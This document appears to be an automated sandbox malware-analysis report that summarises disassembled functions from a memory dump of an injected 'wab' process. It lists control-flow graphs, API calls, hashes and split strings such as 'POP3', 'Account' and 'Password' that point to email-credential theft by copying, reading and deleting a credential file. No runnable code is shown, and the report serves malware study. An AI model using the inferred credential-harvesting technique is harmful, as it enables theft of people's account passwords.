                                                  control_flow_graph 136 2216173a-221617fe call 2216c030 call 22162c40 * 2 143 22161803 call 22161cca 136->143 144 22161808-2216180c 143->144 145 22161812-22161816 144->145 146 221619ad-221619b1 144->146 145->146 147 2216181c-22161837 call 22161ede 145->147 150 2216199f-221619ac call 22161ee7 * 2 147->150 151 2216183d-22161845 147->151 150->146 152 22161982-22161985 151->152 153 2216184b-2216184e 151->153 157 22161987 152->157 158 22161995-22161999 152->158 153->152 155 22161854-22161881 call 221644b0 * 2 call 22161db7 153->155 170 22161887-2216189f call 221644b0 call 22161db7 155->170 171 2216193d-22161943 155->171 161 2216198a-2216198d call 22162c40 157->161 158->150 158->151 165 22161992 161->165 165->158 170->171 187 221618a5-221618a8 170->187 172 22161945-22161947 171->172 173 2216197e-22161980 171->173 172->173 175 22161949-2216194b 172->175 173->161 177 22161961-2216197c call 221616aa 175->177 178 2216194d-2216194f 175->178 177->165 180 22161955-22161957 178->180 181 22161951-22161953 178->181 184 2216195d-2216195f 180->184 185 22161959-2216195b 180->185 181->177 181->180 184->173 184->177 185->177 185->184 188 221618c4-221618dc call 221644b0 call 22161db7 187->188 189 221618aa-221618c2 call 221644b0 call 22161db7 187->189 188->158 198 221618e2-2216193b call 221616aa call 221615da call 22162c40 * 2 188->198 189->188 189->198 198->158
                                                  APIs
                                                    • Part of subcall function 22161CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D1B
                                                    • Part of subcall function 22161CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22161D37
                                                    • Part of subcall function 22161CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D4B
                                                  • _strlen.LIBCMT ref: 22161855
                                                  • _strlen.LIBCMT ref: 22161869
                                                  • _strlen.LIBCMT ref: 2216188B
                                                  • _strlen.LIBCMT ref: 221618AE
                                                  • _strlen.LIBCMT ref: 221618C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strlen$File$CopyCreateDelete
                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                  • API String ID: 3296212668-3023110444
                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                  • Instruction ID: 06181d2993d90701b491b860c636ad99592fc996c113486cbd42447d0bba7097
                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                  • Instruction Fuzzy Hash: EB61F271D80318AEEF158FA4C941FFEB7BAAF15304F004596D604A73A0EB745B66CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                  • API String ID: 4218353326-230879103
                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                  • Instruction ID: 2c9e17488cdac1e88608fc00f7b02b5bf88baa3189421029159ee63a6f4cc7c2
                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                  • Instruction Fuzzy Hash: 037122B1D403685FCB219BB48D85EFF7BFCAB19304F104096E648E3241EA749799CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 276 22167cc2-22167cd6 277 22167d44-22167d4c 276->277 278 22167cd8-22167cdd 276->278 280 22167d93-22167dab call 22167e35 277->280 281 22167d4e-22167d51 277->281 278->277 279 22167cdf-22167ce4 278->279 279->277 282 22167ce6-22167ce9 279->282 290 22167dae-22167db5 280->290 281->280 284 22167d53-22167d90 call 2216571e * 4 281->284 282->277 285 22167ceb-22167cf3 282->285 284->280 288 22167cf5-22167cf8 285->288 289 22167d0d-22167d15 285->289 288->289 292 22167cfa-22167d0c call 2216571e call 221690ba 288->292 295 22167d17-22167d1a 289->295 296 22167d2f-22167d43 call 2216571e * 2 289->296 293 22167db7-22167dbb 290->293 294 22167dd4-22167dd8 290->294 292->289 300 22167dd1 293->300 301 22167dbd-22167dc0 293->301 304 22167df0-22167dfc 294->304 305 22167dda-22167ddf 294->305 295->296 302 22167d1c-22167d2e call 2216571e call 221691b8 295->302 296->277 300->294 301->300 311 22167dc2-22167dd0 call 2216571e * 2 301->311 302->296 304->290 309 22167dfe-22167e0b call 2216571e 304->309 306 22167de1-22167de4 305->306 307 22167ded 305->307 306->307 314 22167de6-22167dec call 2216571e 306->314 307->304 311->300 314->307
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 22167D06
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 221690D7
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 221690E9
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 221690FB
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 2216910D
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 2216911F
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 22169131
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 22169143
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 22169155
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 22169167
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 22169179
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 2216918B
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 2216919D
                                                    • Part of subcall function 221690BA: _free.LIBCMT ref: 221691AF
                                                  • _free.LIBCMT ref: 22167CFB
                                                    • Part of subcall function 2216571E: HeapFree.KERNEL32(00000000,00000000,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?), ref: 22165734
                                                    • Part of subcall function 2216571E: GetLastError.KERNEL32(?,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?,?), ref: 22165746
                                                  • _free.LIBCMT ref: 22167D1D
                                                  • _free.LIBCMT ref: 22167D32
                                                  • _free.LIBCMT ref: 22167D3D
                                                  • _free.LIBCMT ref: 22167D5F
                                                  • _free.LIBCMT ref: 22167D72
                                                  • _free.LIBCMT ref: 22167D80
                                                  • _free.LIBCMT ref: 22167D8B
                                                  • _free.LIBCMT ref: 22167DC3
                                                  • _free.LIBCMT ref: 22167DCA
                                                  • _free.LIBCMT ref: 22167DE7
                                                  • _free.LIBCMT ref: 22167DFF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 865cf05fb4e6d271d265f3658c28adb9c726247197932120ea633d154384dfb4
                                                  • Instruction ID: 713263b54821807fc4d974a1a408b4b73a31198d0ca96144a0290d9c6aa2b586
                                                  • Opcode Fuzzy Hash: 865cf05fb4e6d271d265f3658c28adb9c726247197932120ea633d154384dfb4
                                                  • Instruction Fuzzy Hash: 36314A31680309AFDB719E38DA40FFE77EAEF00355F644859E94897591DA32AAA1CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • _free.LIBCMT ref: 221659EA
                                                    • Part of subcall function 2216571E: HeapFree.KERNEL32(00000000,00000000,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?), ref: 22165734
                                                    • Part of subcall function 2216571E: GetLastError.KERNEL32(?,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?,?), ref: 22165746
                                                  • _free.LIBCMT ref: 221659F6
                                                  • _free.LIBCMT ref: 22165A01
                                                  • _free.LIBCMT ref: 22165A0C
                                                  • _free.LIBCMT ref: 22165A17
                                                  • _free.LIBCMT ref: 22165A22
                                                  • _free.LIBCMT ref: 22165A2D
                                                  • _free.LIBCMT ref: 22165A38
                                                  • _free.LIBCMT ref: 22165A43
                                                  • _free.LIBCMT ref: 22165A51
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: f5ca4ec34c83202702003b60fa78e6139f59215673180ad2341e2af6bee10af6
                                                  • Instruction ID: 026126dd9fe3379e97dc5fb83f5a7c55fb220b16000772f474f8dd363ac1b8c0
                                                  • Opcode Fuzzy Hash: f5ca4ec34c83202702003b60fa78e6139f59215673180ad2341e2af6bee10af6
                                                  • Instruction Fuzzy Hash: 4911A47A56034DFFCB61DF55C841CFD3FAAEF14351B8940A1BA088B621DA32DB609B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D1B
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22161D37
                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D4B
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D58
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D72
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D7D
                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22161D8A
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 1454806937-0
                                                  • Opcode ID: 2144f9530f5fa84e6c4bc49881e35adb110133f2c625f4241a501d0ba2144514
                                                  • Instruction ID: cc23ae2c170ec7b243340aa47beb9a8fa6304f1eec7b6683312e03fa271eb9b6
                                                  • Opcode Fuzzy Hash: 2144f9530f5fa84e6c4bc49881e35adb110133f2c625f4241a501d0ba2144514
                                                  • Instruction Fuzzy Hash: D8212AB1A8121CBFEB109BA18C8CEFF76ECEB18354F0009A5F915D2144D6749F458A70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 377 22169492-221694ef GetConsoleCP 378 221694f5-22169511 377->378 379 22169632-22169644 call 22162ada 377->379 380 22169513-2216952a 378->380 381 2216952c-2216953d call 22167c19 378->381 383 22169566-22169575 call 221679e6 380->383 388 22169563-22169565 381->388 389 2216953f-22169542 381->389 383->379 393 2216957b-2216959b WideCharToMultiByte 383->393 388->383 391 22169548-2216955a call 221679e6 389->391 392 22169609-22169628 389->392 391->379 400 22169560-22169561 391->400 392->379 393->379 394 221695a1-221695b7 WriteFile 393->394 396 2216962a-22169630 GetLastError 394->396 397 221695b9-221695ca 394->397 396->379 397->379 399 221695cc-221695d0 397->399 401 221695d2-221695f0 WriteFile 399->401 402 221695fe-22169601 399->402 400->393 401->396 403 221695f2-221695f6 401->403 402->378 404 22169607 402->404 403->379 405 221695f8-221695fb 403->405 404->379 405->402
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22169C07,?,00000000,?,00000000,00000000), ref: 221694D4
                                                  • __fassign.LIBCMT ref: 2216954F
                                                  • __fassign.LIBCMT ref: 2216956A
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 22169590
                                                  • WriteFile.KERNEL32(?,?,00000000,22169C07,00000000,?,?,?,?,?,?,?,?,?,22169C07,?), ref: 221695AF
                                                  • WriteFile.KERNEL32(?,?,00000001,22169C07,00000000,?,?,?,?,?,?,?,?,?,22169C07,?), ref: 221695E8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 00034858ae612a6c7a6b3f89877da5b0850ad3e18e0cb533d807254a6ba99a4a
                                                  • Instruction ID: dc53643f9a5393e874f3fe7580b82325bc6fd5e98e9af51820f4dfca70bb0c45
                                                  • Opcode Fuzzy Hash: 00034858ae612a6c7a6b3f89877da5b0850ad3e18e0cb533d807254a6ba99a4a
                                                  • Instruction Fuzzy Hash: 4B51B471A803499FDB14CFA4C895EFEBBF8EF08310F10455AE951E7285E7709A51CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 406 22163370-221633b5 call 22163330 call 221637a7 411 22163416-22163419 406->411 412 221633b7-221633c9 406->412 413 2216341b-22163428 call 22163790 411->413 414 22163439-22163442 411->414 412->414 415 221633cb 412->415 418 2216342d-22163436 call 22163330 413->418 417 221633d0-221633e7 415->417 419 221633fd 417->419 420 221633e9-221633f7 call 22163740 417->420 418->414 421 22163400-22163405 419->421 427 2216340d-22163414 420->427 428 221633f9 420->428 421->417 425 22163407-22163409 421->425 425->414 429 2216340b 425->429 427->418 430 22163443-2216344c 428->430 431 221633fb 428->431 429->418 432 22163486-22163496 call 22163774 430->432 433 2216344e-22163455 430->433 431->421 439 221634aa-221634c6 call 22163330 call 22163758 432->439 440 22163498-221634a7 call 22163790 432->440 433->432 434 22163457-22163466 call 2216bbe0 433->434 442 22163483 434->442 443 22163468-22163480 434->443 440->439 442->432 443->442
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 2216339B
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 221633A3
                                                  • _ValidateLocalCookies.LIBCMT ref: 22163431
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 2216345C
                                                  • _ValidateLocalCookies.LIBCMT ref: 221634B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: f475545a380e75a1fb6ec4aaf997d5cc416b46c9a1ad3cc0691d5b73d5f3cf96
                                                  • Instruction ID: 65a2f6c6d43c96edd904e1cddbaa7c765d76bbef2173d92d73e143152daae6fd
                                                  • Opcode Fuzzy Hash: f475545a380e75a1fb6ec4aaf997d5cc416b46c9a1ad3cc0691d5b73d5f3cf96
                                                  • Instruction Fuzzy Hash: D541A134A403489FCB01CF69C884EBEBBB5AF45B28F148155E9259F391DB35DB25CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 22169221: _free.LIBCMT ref: 2216924A
                                                  • _free.LIBCMT ref: 221692AB
                                                    • Part of subcall function 2216571E: HeapFree.KERNEL32(00000000,00000000,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?), ref: 22165734
                                                    • Part of subcall function 2216571E: GetLastError.KERNEL32(?,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?,?), ref: 22165746
                                                  • _free.LIBCMT ref: 221692B6
                                                  • _free.LIBCMT ref: 221692C1
                                                  • _free.LIBCMT ref: 22169315
                                                  • _free.LIBCMT ref: 22169320
                                                  • _free.LIBCMT ref: 2216932B
                                                  • _free.LIBCMT ref: 22169336
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                  • Instruction ID: aa8e9eee65dd22d603fc7e5692a0295ef14a8bfcf0066a21ee3711ae9fa0bbeb
                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                  • Instruction Fuzzy Hash: 791181315C0B08FFD6B0ABB0DC45FFF7B9E9F14700F848828A69976052DA26B6644751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 22168821-2216883a 489 22168850-22168855 488->489 490 2216883c-2216884c call 22169341 488->490 491 22168857-2216885f 489->491 492 22168862-22168886 MultiByteToWideChar 489->492 490->489 497 2216884e 490->497 491->492 494 2216888c-22168898 492->494 495 22168a19-22168a2c call 22162ada 492->495 498 221688ec 494->498 499 2216889a-221688ab 494->499 497->489 501 221688ee-221688f0 498->501 502 221688ad-221688bc call 2216bf20 499->502 503 221688ca-221688db call 221656d0 499->503 505 221688f6-22168909 MultiByteToWideChar 501->505 506 22168a0e 501->506 502->506 515 221688c2-221688c8 502->515 503->506 516 221688e1 503->516 505->506 509 2216890f-2216892a call 22165f19 505->509 510 22168a10-22168a17 call 22168801 506->510 509->506 520 22168930-22168937 509->520 510->495 519 221688e7-221688ea 515->519 516->519 519->501 521 22168971-2216897d 520->521 522 22168939-2216893e 520->522 524 2216897f-22168990 521->524 525 221689c9 521->525 522->510 523 22168944-22168946 522->523 523->506 526 2216894c-22168966 call 22165f19 523->526 528 22168992-221689a1 call 2216bf20 524->528 529 221689ab-221689bc call 221656d0 524->529 527 221689cb-221689cd 525->527 526->510 543 2216896c 526->543 532 22168a07-22168a0d call 22168801 527->532 533 221689cf-221689e8 call 22165f19 527->533 528->532 541 221689a3-221689a9 528->541 529->532 542 221689be 529->542 532->506 533->532 546 221689ea-221689f1 533->546 545 221689c4-221689c7 541->545 542->545 543->506 545->527 547 221689f3-221689f4 546->547 548 22168a2d-22168a33 546->548 549 221689f5-22168a05 WideCharToMultiByte 547->549 548->549 549->532 550 22168a35-22168a3c call 22168801 549->550 550->510
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22166FFD,00000000,?,?,?,22168A72,?,?,00000100), ref: 2216887B
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,22168A72,?,?,00000100,5EFC4D8B,?,?), ref: 22168901
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 221689FB
                                                  • __freea.LIBCMT ref: 22168A08
                                                    • Part of subcall function 221656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22165702
                                                  • __freea.LIBCMT ref: 22168A11
                                                  • __freea.LIBCMT ref: 22168A36
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: f2b64843c44a406c7f985f8d44426c9960538a55f166ed7a96703d6ece18230e
                                                  • Instruction ID: 0935ef22ce4b924d1349bff41f259846a1262059d469d80f1ab686904fd61180
                                                  • Opcode Fuzzy Hash: f2b64843c44a406c7f985f8d44426c9960538a55f166ed7a96703d6ece18230e
                                                  • Instruction Fuzzy Hash: FF510372690316AFDB148E60CD44FFF37A9EB40758F524668FD04D6180EB35DE69CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _strlen.LIBCMT ref: 22161607
                                                  • _strcat.LIBCMT ref: 2216161D
                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2216190E,?,?,00000000,?,00000000), ref: 22161643
                                                  • lstrcatW.KERNEL32(?,?), ref: 2216165A
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,2216190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22161661
                                                  • lstrcatW.KERNEL32(00001008,?), ref: 22161686
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                  • String ID:
                                                  • API String ID: 1922816806-0
                                                  • Opcode ID: e4b7560fad36abd3a9fc2781783c9435ea3804ae7987d9d38b51bffd01e827ee
                                                  • Instruction ID: e532d458162e3456c1efa048b9b60deeeba765335bed4f45aada737e64451fa1
                                                  • Opcode Fuzzy Hash: e4b7560fad36abd3a9fc2781783c9435ea3804ae7987d9d38b51bffd01e827ee
                                                  • Instruction Fuzzy Hash: 6D21F536A40304AFDB049F64DC81EFE77B9EF88710F24441AE904AB284DB74A65187A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrcatW.KERNEL32(?,?), ref: 22161038
                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2216104B
                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22161061
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22161075
                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22161090
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 221610B8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                  • String ID:
                                                  • API String ID: 3594823470-0
                                                  • Opcode ID: a85e884da5c3c82bd75c81dbd14fd9d48b02b99990120f54150b1774ccc56a20
                                                  • Instruction ID: 7ffd2aaa4d18af10e04ccd8add0a9b64e90a1139c502b55393514b97831bd018
                                                  • Opcode Fuzzy Hash: a85e884da5c3c82bd75c81dbd14fd9d48b02b99990120f54150b1774ccc56a20
                                                  • Instruction Fuzzy Hash: C6219F35D40318ABCF509AA1DD48EFF3768EF84314F104696E959A32B1DA309B95CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,22163518,221623F1,22161F17), ref: 22163864
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22163872
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2216388B
                                                  • SetLastError.KERNEL32(00000000,?,22163518,221623F1,22161F17), ref: 221638DD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 69672a35f120d122230ebdc2105e643feb6db2df0a446ff6fd555985220f88e4
                                                  • Instruction ID: 776a068d1b2c288d10702f8240f686b51eab130a66a49625a8021325d126e5f7
                                                  • Opcode Fuzzy Hash: 69672a35f120d122230ebdc2105e643feb6db2df0a446ff6fd555985220f88e4
                                                  • Instruction Fuzzy Hash: 9401D433BCD7126EA254267A6C88EFF2BD8EB96F757200339E9309D0D5EF154A259340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,22166C6C), ref: 22165AFA
                                                  • _free.LIBCMT ref: 22165B2D
                                                  • _free.LIBCMT ref: 22165B55
                                                  • SetLastError.KERNEL32(00000000,?,?,22166C6C), ref: 22165B62
                                                  • SetLastError.KERNEL32(00000000,?,?,22166C6C), ref: 22165B6E
                                                  • _abort.LIBCMT ref: 22165B74
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: cf89ec0c21aadd6e8433c72a00315ed2b480f9d5a64acf62b965a758a0f1e99b
                                                  • Instruction ID: 13973c9bfc3278fd9c1c1beaa565eea95a6ba1e2b952bc8f744ed1e721028fb6
                                                  • Opcode Fuzzy Hash: cf89ec0c21aadd6e8433c72a00315ed2b480f9d5a64acf62b965a758a0f1e99b
